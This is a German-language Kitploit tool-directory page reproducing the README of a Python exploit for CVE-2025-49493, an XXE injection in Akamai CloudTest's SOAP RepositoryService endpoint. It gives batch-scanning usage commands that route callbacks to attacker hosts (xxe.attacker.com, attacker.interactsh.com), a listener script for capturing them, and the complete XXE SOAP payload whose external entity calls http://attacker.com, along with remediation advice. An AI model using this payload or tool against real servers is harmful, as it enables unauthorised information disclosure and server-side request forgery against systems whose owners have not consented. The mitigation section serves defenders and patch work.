Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49493 — This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint. | Kitploit
Tools/GitHubGitHub/sh4den/cve-2025-49493
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsh4den/cve-2025-49493

CVE-2025-49493

This is a Python-based exploit for CVE-2025-49493, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint.

Repository anzeigen
1vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Akamai CloudTest XXE Exploit (CVE-2025-49493)

Übersicht

Dies ist ein Python-basierter Exploit für CVE-2025-49493, der Akamai CloudTest-Versionen vor 60 2025.06.02 (12988) betrifft. Die Schwachstelle ermöglicht XML External Entity (XXE)-Injection über den SOAP-Dienstendpunkt.

Details zur Schwachstelle

  • CVE ID: CVE-2025-49493
  • Typ der Schwachstelle: XML External Entity (XXE) Injection
  • Schweregrad: Kritisch (CVSS 9.1)
  • Betroffene Software: Akamai CloudTest
  • Betroffene Versionen: Vor 60 2025.06.02 (12988)
  • Angriffsvektor: Netzwerk
  • Authentifizierung erforderlich: Nein

Technische Details

Die Schwachstelle existiert im SOAP-Endpunkt /concerto/services/RepositoryService, wo XML-Eingaben ohne ordnungsgemäße Bereinigung externer Entitäten verarbeitet werden. Ein Angreifer kann bösartige XML-Payloads erstellen, um XXE-Angriffe auszulösen, die möglicherweise zu Folgendem führen:

  • Offenlegung von Informationen
  • SSRF (Server-Side Request Forgery)
  • Denial of Service
  • Potenzielle RCE in bestimmten Konfigurationen

Funktionen

  • Zielerkennung: Automatische Identifizierung von Akamai CloudTest-Instanzen
  • Schwachstellenerkennung: Überprüfung auf anfällige Endpunkte und Indikatoren
  • XXE-Ausnutzung: Sendet maßgeschneiderte SOAP-Anfragen mit XXE-Payloads
  • Mehrere Ziele: Unterstützt Stapelverarbeitung aus Zieldateien
  • Detaillierte Protokollierung: Umfassende farbige Protokollierung mit Zeitstempeln
  • Fehlerbehandlung: Robuste Fehlerbehandlung für Netzwerkprobleme

Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip-Paketmanager

Abhängigkeiten

Installieren Sie die erforderlichen Pakete:

root@kitploit:~
pip install -r requirements.txt

Oder manuell installieren:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Verwendung

Einfache Verwendung

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Erweiterte Verwendung

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Befehlszeilenoptionen

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

Format der Zieldatei

Erstellen Sie eine Datei targets.txt mit einem Ziel pro Zeile:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Einrichten des XXE-Servers

Option 1: Verwendung von Burp Collaborator

  1. Öffnen Sie Burp Suite Professional
  2. Gehen Sie zu Burp > Burp Collaborator client
  3. Klicken Sie auf "Copy to clipboard", um Ihre Collaborator-URL zu erhalten
  4. Verwenden Sie diese URL als Parameter xxe_server

Option 2: Verwendung von Interactsh

  1. Install interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Run: interactsh-client
  3. Verwenden Sie die bereitgestellte URL als Parameter xxe_server

Option 3: Benutzerdefinierter HTTP-Server

Richten Sie einen einfachen HTTP-Server ein, um Anfragen zu erfassen:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Exploit-Ablauf

  1. Zielvalidierung: Überprüft URL-Format und Erreichbarkeit
  2. Schwachstellenerkennung:
    • Überprüft auf CloudTest-Indikatoren in der Antwort
    • Verifiziert, dass der SOAP-Dienstendpunkt existiert
  3. XXE-Payload-Generierung: Erstellt bösartigen SOAP-Envelope mit XXE
  4. Ausnutzung: Sendet maßgeschneiderte Anfrage an anfälligen Endpunkt
  5. Ergebnisanalyse: Analysiert Antwort auf Erfolgsindikatoren

XXE-Payload-Struktur

Der Exploit verwendet die folgende XXE-Payload-Struktur:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Abhilfemaßnahmen

Für Administratoren

  1. Sofortmaßnahmen:

    • Aktualisieren Sie Akamai CloudTest auf Version 60 2025.06.02 oder später
    • Überwachen Sie Protokolle auf verdächtige XML-Verarbeitungsaktivitäten
    • Implementieren Sie Netzwerksegmentierung, um die Exposition zu begrenzen
  2. Langfristige Lösungen:

    • Deaktivieren Sie die Verarbeitung externer XML-Entitäten in XML-Parsern
    • Implementieren Sie Eingabevalidierung und -bereinigung
    • Verwenden Sie Positivlisten für die XML-Verarbeitung
    • Regelmäßige Sicherheitsbewertungen

Für Entwickler

  1. Sichere XML-Verarbeitung:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Eingabevalidierung:

    • Validieren Sie alle XML-Eingaben gegen strenge Schemas
    • Bereinigen Sie benutzergesteuerte Daten vor der XML-Verarbeitung
    • Implementieren Sie eine ordnungsgemäße Fehlerbehandlung

Referenzen

  • Originalforschung von xbow
  • Akamai CloudTest-Änderungsprotokoll
  • Details zu CVE-2025-49493
  • OWASP XXE-Prävention

Rechtlicher Hinweis

Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Testzwecken bereitgestellt. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor dem Testen von Systemen über die entsprechende Autorisierung verfügen. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Mitwirken

  1. Repository forken
  2. Erstellen Sie einen Feature-Branch
  3. Nehmen Sie Ihre Änderungen vor
  4. Fügen Sie ggf. Tests hinzu
  5. Reichen Sie einen Pull-Request ein

Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.

Autoren

  • Originalforschung: xbow, 3th1c_yuk1
  • Exploit-Entwicklung: Security Research Team
  • CVE-Zuweisung: CVE-2025-49493

Änderungsprotokoll

v1.0.0

  • Erstveröffentlichung
  • Grundlegende XXE-Ausnutzungsfunktionalität
  • Unterstützung für Zieldateien
  • Umfassende Protokollierung
  • Verbesserungen der Fehlerbehandlung
Tool herunterladen